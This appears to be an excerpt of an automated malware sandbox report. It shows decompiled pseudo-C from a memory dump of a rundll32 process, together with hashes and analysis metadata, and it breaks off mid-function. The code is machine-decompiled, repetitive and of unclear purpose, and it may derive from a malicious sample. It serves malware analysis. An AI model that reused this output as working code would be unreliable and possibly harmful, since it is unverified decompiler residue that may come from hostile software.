                                        • Instruction ID: c38816466bb2c0eb9531f17dae44f26e1d6a1a86a2f38be7ed61ccfa7437ce9e
                                        • Opcode Fuzzy Hash: faee3053493eed21173e01546e8c39f72b2ac5eb792b1d4fe10e4af215a08a51
                                        • Instruction Fuzzy Hash: D961813220528186EF589B61ED29BEF77A1E7A1784F159037DE4547F86EA7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7A7(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
                                        				signed char _t68;
                                        				signed char _t69;
                                        				void* _t75;
                                        				signed char _t80;
                                        				intOrPtr _t92;
                                        				void* _t94;
                                        				signed int _t116;
                                        				long long _t134;
                                        				void* _t135;
                                        				void* _t179;
                                        
                                        				_t179 = __r9;
                                        				_t135 = __rbx;
                                        				_t134 = __rax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
                                        				goto 0xf304a7f7;
                                        				_t9 = __rbx + 0xc8;
                                        				 *_t9 =  *(__rbx + 0xc8) | 0x00000040;
                                        				_t116 =  *_t9;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
                                        				_t68 = __eax - 0xc88b83;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t68;
                                        				_t69 = _t68 & 0x0000003d;
                                        				 *__rcx =  *__rcx - _t69;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t69;
                                        				if (_t116 == 0) goto 0xf304a7ed;
                                        				if (_t69 != 0x38e) goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
                                        				_a80 = _a80 + 1;
                                        				if (_a80 - E0000021E21EF30290D0(_t69, __rdi) < 0) goto 0xf304a761;
                                        				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(__rax, _t135);
                                        				if (__rax == 0) goto 0xf304a85d;
                                        				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
                                        				 *(_t135 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
                                        				goto 0xf304a84e;
                                        				 *(_t135 + 0xcc) = __ebp;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000008;
                                        				E0000021E21EF30749F0(__rax);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t134, _t135);
                                        				r9d = 0;
                                        				 *((long long*)(_t135 + 0xd0)) = _t134;
                                        				r8d = 0;
                                        				_t75 = E0000021E21EF3091730(_t134, _t135);
                                        				 *((long long*)(_t135 + 0xd8)) = _t134;
                                        				E0000021E21EF30480C0(E0000021E21EF3035740(_t75, _t135), _t135);
                                        				if (E0000021E21EF3047B30(_t134, _t135, _t134, _t134) != 0) goto 0xf304a8e8;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000020;
                                        				if (E0000021E21EF3049EB0(_t134, _t135,  *((intOrPtr*)(_t135 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
                                        				_t80 =  *(_t135 + 0xc0);
                                        				if ((_t80 & 0x00000002) == 0) goto 0xf304a8de;
                                        				if (( *(_t135 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
                                        				asm("bts eax, 0xd");
                                        				 *(_t135 + 0xc0) = _t80;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t134, _t135);
                                        				r9d = 0;
                                        				 *((long long*)(_t135 + 0xf0)) = _t134;
                                        				E0000021E21EF3091730(_t134, _t135);
                                        				 *((long long*)(_t135 + 0xf8)) = _t134;
                                        				if (_t134 != 0) goto 0xf304a933;
                                        				if (_a80 == 0xffffffff) goto 0xf304a933;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000080;
                                        				E0000021E21EF304A430(_a80 - 0xffffffff, _t134, _t135, _t135, _t134);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t134, _t135);
                                        				r9d = 0;
                                        				 *((long long*)(_t135 + 0x100)) = _t134;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t134, _t135);
                                        				 *((long long*)(_t135 + 0x108)) = _t134;
                                        				_a80 = __ebp;
                                        				if (_a80 - E0000021E21EF3091710(_t134, _t135) >= 0) goto 0xf304aa2e;
                                        				E0000021E21EF30916D0(_t134, _t135);
                                        				E0000021E21EF30AC080(_t134);
                                        				if (E0000021E21EF3031F80(_t134, _t134) != 0x359) goto 0xf304a9c1;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00001000;
                                        				if (E0000021E21EF3091750(_t134) == 0) goto 0xf304aa0a;
                                        				E0000021E21EF30AC080(_t134);
                                        				_t92 = E0000021E21EF3031F80(_t134, _t134);
                                        				_a88 = _t92;
                                        				if (_t92 == 0) goto 0xf304aa24;
                                        				r9d = 4;
                                        				_a32 = 0xf309af50;
                                        				_t57 = _t179 + 0xa; // 0xa
                                        				r8d = _t57;
                                        				E0000021E21EF30319D0(_t134);
                                        				if (_t134 == 0) goto 0xf304aa24;
                                        				_a80 = _a80 + 1;
                                        				_t94 = E0000021E21EF3091710(_t134, _t135);
                                        				if (_a80 - _t94 < 0) goto 0xf304a993;
                                        				goto 0xf304aa2e;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000200;
                                        				 *(_t135 + 0xc0) =  *(_t135 + 0xc0) | 0x00000100;
                                        				return _t94;
                                        			}














                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: f98d0d10f6ba1c480b1e17fe1dbdc1d73ead3945fe49c251a8d8674fd3338632
                                        • Instruction ID: 020bda0c2352d5726d025d26b4ad99336c7e376ebd9ed3419b0844ee4da7fdb7
                                        • Opcode Fuzzy Hash: f98d0d10f6ba1c480b1e17fe1dbdc1d73ead3945fe49c251a8d8674fd3338632
                                        • Instruction Fuzzy Hash: FE519F3220528186EF589B21ED29BEF73A1E7A1784F169136DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A795(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
                                        				signed char _t72;
                                        				signed char _t73;
                                        				void* _t79;
                                        				signed char _t84;
                                        				intOrPtr _t96;
                                        				void* _t98;
                                        				signed int _t124;
                                        				long long _t142;
                                        				void* _t143;
                                        				void* _t188;
                                        
                                        				_t188 = __r9;
                                        				_t143 = __rbx;
                                        				_t142 = __rax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *__rcx =  *__rcx + __eax;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000002;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *__rdx =  *__rdx + __eax;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000004;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
                                        				goto 0xf304a7f7;
                                        				_t13 = __rbx + 0xc8;
                                        				 *_t13 =  *(__rbx + 0xc8) | 0x00000040;
                                        				_t124 =  *_t13;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
                                        				_t72 = __eax - 0xc88b83;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t72;
                                        				_t73 = _t72 & 0x0000003d;
                                        				 *__rcx =  *__rcx - _t73;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t73;
                                        				if (_t124 == 0) goto 0xf304a7ed;
                                        				if (_t73 != 0x38e) goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
                                        				_a80 = _a80 + 1;
                                        				if (_a80 - E0000021E21EF30290D0(_t73, __rdi) < 0) goto 0xf304a761;
                                        				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(__rax, _t143);
                                        				if (__rax == 0) goto 0xf304a85d;
                                        				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
                                        				 *(_t143 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
                                        				goto 0xf304a84e;
                                        				 *(_t143 + 0xcc) = __ebp;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000008;
                                        				E0000021E21EF30749F0(__rax);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t142, _t143);
                                        				r9d = 0;
                                        				 *((long long*)(_t143 + 0xd0)) = _t142;
                                        				r8d = 0;
                                        				_t79 = E0000021E21EF3091730(_t142, _t143);
                                        				 *((long long*)(_t143 + 0xd8)) = _t142;
                                        				E0000021E21EF30480C0(E0000021E21EF3035740(_t79, _t143), _t143);
                                        				if (E0000021E21EF3047B30(_t142, _t143, _t142, _t142) != 0) goto 0xf304a8e8;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000020;
                                        				if (E0000021E21EF3049EB0(_t142, _t143,  *((intOrPtr*)(_t143 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
                                        				_t84 =  *(_t143 + 0xc0);
                                        				if ((_t84 & 0x00000002) == 0) goto 0xf304a8de;
                                        				if (( *(_t143 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
                                        				asm("bts eax, 0xd");
                                        				 *(_t143 + 0xc0) = _t84;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t142, _t143);
                                        				r9d = 0;
                                        				 *((long long*)(_t143 + 0xf0)) = _t142;
                                        				E0000021E21EF3091730(_t142, _t143);
                                        				 *((long long*)(_t143 + 0xf8)) = _t142;
                                        				if (_t142 != 0) goto 0xf304a933;
                                        				if (_a80 == 0xffffffff) goto 0xf304a933;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000080;
                                        				E0000021E21EF304A430(_a80 - 0xffffffff, _t142, _t143, _t143, _t142);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t142, _t143);
                                        				r9d = 0;
                                        				 *((long long*)(_t143 + 0x100)) = _t142;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t142, _t143);
                                        				 *((long long*)(_t143 + 0x108)) = _t142;
                                        				_a80 = __ebp;
                                        				if (_a80 - E0000021E21EF3091710(_t142, _t143) >= 0) goto 0xf304aa2e;
                                        				E0000021E21EF30916D0(_t142, _t143);
                                        				E0000021E21EF30AC080(_t142);
                                        				if (E0000021E21EF3031F80(_t142, _t142) != 0x359) goto 0xf304a9c1;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00001000;
                                        				if (E0000021E21EF3091750(_t142) == 0) goto 0xf304aa0a;
                                        				E0000021E21EF30AC080(_t142);
                                        				_t96 = E0000021E21EF3031F80(_t142, _t142);
                                        				_a88 = _t96;
                                        				if (_t96 == 0) goto 0xf304aa24;
                                        				r9d = 4;
                                        				_a32 = 0xf309af50;
                                        				_t61 = _t188 + 0xa; // 0xa
                                        				r8d = _t61;
                                        				E0000021E21EF30319D0(_t142);
                                        				if (_t142 == 0) goto 0xf304aa24;
                                        				_a80 = _a80 + 1;
                                        				_t98 = E0000021E21EF3091710(_t142, _t143);
                                        				if (_a80 - _t98 < 0) goto 0xf304a993;
                                        				goto 0xf304aa2e;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000200;
                                        				 *(_t143 + 0xc0) =  *(_t143 + 0xc0) | 0x00000100;
                                        				return _t98;
                                        			}














                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 5d5e11c77c2c419bd1ccf9e43de01aa5263bff53a9bd12fb9758ac9a590358e5
                                        • Instruction ID: 6111bf94eca1fcdacf68c7f0be482fc60abd99a39632c02652483f168591c4e5
                                        • Opcode Fuzzy Hash: 5d5e11c77c2c419bd1ccf9e43de01aa5263bff53a9bd12fb9758ac9a590358e5
                                        • Instruction Fuzzy Hash: 7251603230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A79E(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, intOrPtr* __rdx, void* __rdi, void* __rsi, signed int __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
                                        				signed char _t70;
                                        				signed char _t71;
                                        				void* _t77;
                                        				signed char _t82;
                                        				intOrPtr _t94;
                                        				void* _t96;
                                        				signed int _t120;
                                        				long long _t138;
                                        				void* _t139;
                                        				void* _t184;
                                        
                                        				_t184 = __r9;
                                        				_t139 = __rbx;
                                        				_t138 = __rax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *__rdx =  *__rdx + __eax;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000004;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rbx + __rbp * 8)) =  *((intOrPtr*)(__rbx + __rbp * 8)) + __eax;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000008;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000010;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
                                        				goto 0xf304a7f7;
                                        				_t11 = __rbx + 0xc8;
                                        				 *_t11 =  *(__rbx + 0xc8) | 0x00000040;
                                        				_t120 =  *_t11;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
                                        				_t70 = __eax - 0xc88b83;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t70;
                                        				_t71 = _t70 & 0x0000003d;
                                        				 *__rcx =  *__rcx - _t71;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t71;
                                        				if (_t120 == 0) goto 0xf304a7ed;
                                        				if (_t71 != 0x38e) goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
                                        				_a80 = _a80 + 1;
                                        				if (_a80 - E0000021E21EF30290D0(_t71, __rdi) < 0) goto 0xf304a761;
                                        				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(__rax, _t139);
                                        				if (__rax == 0) goto 0xf304a85d;
                                        				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
                                        				 *(_t139 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
                                        				goto 0xf304a84e;
                                        				 *(_t139 + 0xcc) = __ebp;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000008;
                                        				E0000021E21EF30749F0(__rax);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t138, _t139);
                                        				r9d = 0;
                                        				 *((long long*)(_t139 + 0xd0)) = _t138;
                                        				r8d = 0;
                                        				_t77 = E0000021E21EF3091730(_t138, _t139);
                                        				 *((long long*)(_t139 + 0xd8)) = _t138;
                                        				E0000021E21EF30480C0(E0000021E21EF3035740(_t77, _t139), _t139);
                                        				if (E0000021E21EF3047B30(_t138, _t139, _t138, _t138) != 0) goto 0xf304a8e8;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000020;
                                        				if (E0000021E21EF3049EB0(_t138, _t139,  *((intOrPtr*)(_t139 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
                                        				_t82 =  *(_t139 + 0xc0);
                                        				if ((_t82 & 0x00000002) == 0) goto 0xf304a8de;
                                        				if (( *(_t139 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
                                        				asm("bts eax, 0xd");
                                        				 *(_t139 + 0xc0) = _t82;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t138, _t139);
                                        				r9d = 0;
                                        				 *((long long*)(_t139 + 0xf0)) = _t138;
                                        				E0000021E21EF3091730(_t138, _t139);
                                        				 *((long long*)(_t139 + 0xf8)) = _t138;
                                        				if (_t138 != 0) goto 0xf304a933;
                                        				if (_a80 == 0xffffffff) goto 0xf304a933;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000080;
                                        				E0000021E21EF304A430(_a80 - 0xffffffff, _t138, _t139, _t139, _t138);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t138, _t139);
                                        				r9d = 0;
                                        				 *((long long*)(_t139 + 0x100)) = _t138;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t138, _t139);
                                        				 *((long long*)(_t139 + 0x108)) = _t138;
                                        				_a80 = __ebp;
                                        				if (_a80 - E0000021E21EF3091710(_t138, _t139) >= 0) goto 0xf304aa2e;
                                        				E0000021E21EF30916D0(_t138, _t139);
                                        				E0000021E21EF30AC080(_t138);
                                        				if (E0000021E21EF3031F80(_t138, _t138) != 0x359) goto 0xf304a9c1;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00001000;
                                        				if (E0000021E21EF3091750(_t138) == 0) goto 0xf304aa0a;
                                        				E0000021E21EF30AC080(_t138);
                                        				_t94 = E0000021E21EF3031F80(_t138, _t138);
                                        				_a88 = _t94;
                                        				if (_t94 == 0) goto 0xf304aa24;
                                        				r9d = 4;
                                        				_a32 = 0xf309af50;
                                        				_t59 = _t184 + 0xa; // 0xa
                                        				r8d = _t59;
                                        				E0000021E21EF30319D0(_t138);
                                        				if (_t138 == 0) goto 0xf304aa24;
                                        				_a80 = _a80 + 1;
                                        				_t96 = E0000021E21EF3091710(_t138, _t139);
                                        				if (_a80 - _t96 < 0) goto 0xf304a993;
                                        				goto 0xf304aa2e;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000200;
                                        				 *(_t139 + 0xc0) =  *(_t139 + 0xc0) | 0x00000100;
                                        				return _t96;
                                        			}














                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 4e2a2d3ebdd26eddb8fd311a2c26a85e33e11756cd8a3ad09c850db554574ccb
                                        • Instruction ID: ee34b2f28607c13b6284c1336a641f908b209454309bf36956331f997d26b3c5
                                        • Opcode Fuzzy Hash: 4e2a2d3ebdd26eddb8fd311a2c26a85e33e11756cd8a3ad09c850db554574ccb
                                        • Instruction Fuzzy Hash: DF51713230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E0000021E21EF304A7B9(void* __eax, void* __ebx, void* __edx, void* __edi, signed int __ebp, long long __rax, void* __rbx, intOrPtr* __rcx, void* __rdi, void* __rsi, void* __rbp, void* __r9, long long _a32, void* _a48, void* _a56, signed int _a80, intOrPtr _a88, void* _a96) {
                                        				signed char _t60;
                                        				signed char _t61;
                                        				void* _t67;
                                        				signed char _t72;
                                        				intOrPtr _t84;
                                        				void* _t86;
                                        				signed int _t106;
                                        				long long _t124;
                                        				void* _t125;
                                        				void* _t169;
                                        
                                        				_t169 = __r9;
                                        				_t125 = __rbx;
                                        				_t124 = __rax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __edx;
                                        				goto 0xf304a7f7;
                                        				_t1 = __rbx + 0xc8;
                                        				 *_t1 =  *(__rbx + 0xc8) | 0x00000040;
                                        				_t106 =  *_t1;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + __eax;
                                        				 *((intOrPtr*)(__rax - 0x15)) =  *((intOrPtr*)(__rax - 0x15)) + __eax;
                                        				_t60 = __eax - 0xc88b83;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t60;
                                        				_t61 = _t60 & 0x0000003d;
                                        				 *__rcx =  *__rcx - _t61;
                                        				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t61;
                                        				if (_t106 == 0) goto 0xf304a7ed;
                                        				if (_t61 != 0x38e) goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000100;
                                        				goto 0xf304a7f7;
                                        				 *(__rbx + 0xc8) =  *(__rbx + 0xc8) | 0x00000080;
                                        				_a80 = _a80 + 1;
                                        				if (_a80 - E0000021E21EF30290D0(_t61, __rdi) < 0) goto 0xf304a761;
                                        				E0000021E21EF3029110(__rax, __rbx, __rdi, E0000021E21EF304C500, __rdi, __rbp);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(__rax, _t125);
                                        				if (__rax == 0) goto 0xf304a85d;
                                        				if ( *((intOrPtr*)(__rax)) - __ebp <= 0) goto 0xf304a848;
                                        				 *(_t125 + 0xcc) =  *( *(__rax + 8)) & 0x000000ff;
                                        				goto 0xf304a84e;
                                        				 *(_t125 + 0xcc) = __ebp;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000008;
                                        				E0000021E21EF30749F0(__rax);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t124, _t125);
                                        				r9d = 0;
                                        				 *((long long*)(_t125 + 0xd0)) = _t124;
                                        				r8d = 0;
                                        				_t67 = E0000021E21EF3091730(_t124, _t125);
                                        				 *((long long*)(_t125 + 0xd8)) = _t124;
                                        				E0000021E21EF30480C0(E0000021E21EF3035740(_t67, _t125), _t125);
                                        				if (E0000021E21EF3047B30(_t124, _t125, _t124, _t124) != 0) goto 0xf304a8e8;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000020;
                                        				if (E0000021E21EF3049EB0(_t124, _t125,  *((intOrPtr*)(_t125 + 0xd8)), __rsi) != 0) goto 0xf304a8e8;
                                        				_t72 =  *(_t125 + 0xc0);
                                        				if ((_t72 & 0x00000002) == 0) goto 0xf304a8de;
                                        				if (( *(_t125 + 0xc4) & 0x00000004) == 0) goto 0xf304a8e8;
                                        				asm("bts eax, 0xd");
                                        				 *(_t125 + 0xc0) = _t72;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t124, _t125);
                                        				r9d = 0;
                                        				 *((long long*)(_t125 + 0xf0)) = _t124;
                                        				E0000021E21EF3091730(_t124, _t125);
                                        				 *((long long*)(_t125 + 0xf8)) = _t124;
                                        				if (_t124 != 0) goto 0xf304a933;
                                        				if (_a80 == 0xffffffff) goto 0xf304a933;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000080;
                                        				E0000021E21EF304A430(_a80 - 0xffffffff, _t124, _t125, _t125, _t124);
                                        				r9d = 0;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t124, _t125);
                                        				r9d = 0;
                                        				 *((long long*)(_t125 + 0x100)) = _t124;
                                        				r8d = 0;
                                        				E0000021E21EF3091730(_t124, _t125);
                                        				 *((long long*)(_t125 + 0x108)) = _t124;
                                        				_a80 = __ebp;
                                        				if (_a80 - E0000021E21EF3091710(_t124, _t125) >= 0) goto 0xf304aa2e;
                                        				E0000021E21EF30916D0(_t124, _t125);
                                        				E0000021E21EF30AC080(_t124);
                                        				if (E0000021E21EF3031F80(_t124, _t124) != 0x359) goto 0xf304a9c1;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00001000;
                                        				if (E0000021E21EF3091750(_t124) == 0) goto 0xf304aa0a;
                                        				E0000021E21EF30AC080(_t124);
                                        				_t84 = E0000021E21EF3031F80(_t124, _t124);
                                        				_a88 = _t84;
                                        				if (_t84 == 0) goto 0xf304aa24;
                                        				r9d = 4;
                                        				_a32 = 0xf309af50;
                                        				_t49 = _t169 + 0xa; // 0xa
                                        				r8d = _t49;
                                        				E0000021E21EF30319D0(_t124);
                                        				if (_t124 == 0) goto 0xf304aa24;
                                        				_a80 = _a80 + 1;
                                        				_t86 = E0000021E21EF3091710(_t124, _t125);
                                        				if (_a80 - _t86 < 0) goto 0xf304a993;
                                        				goto 0xf304aa2e;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000200;
                                        				 *(_t125 + 0xc0) =  *(_t125 + 0xc0) | 0x00000100;
                                        				return _t86;
                                        			}














                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: ffc1cc11a4c23583d4d14f45511aaee4435bfcd379a2bb1858b3f3bb88fc3e90
                                        • Instruction ID: 0c05f68b465636ad685bcb0a4a8d4060c61f4577115e3e7d89173ff634ee5be2
                                        • Opcode Fuzzy Hash: ffc1cc11a4c23583d4d14f45511aaee4435bfcd379a2bb1858b3f3bb88fc3e90
                                        • Instruction Fuzzy Hash: 4551813230528186EF589B61ED29BEF77A1E7A1784F169036DE4647F86EB7CC902C710
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E0000021E21EF3125E3C(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                        				void* _t28;
                                        				signed int _t56;
                                        				void* _t58;
                                        				void* _t69;
                                        				signed long long _t70;
                                        				void* _t75;
                                        				signed int* _t81;
                                        				signed long long _t83;
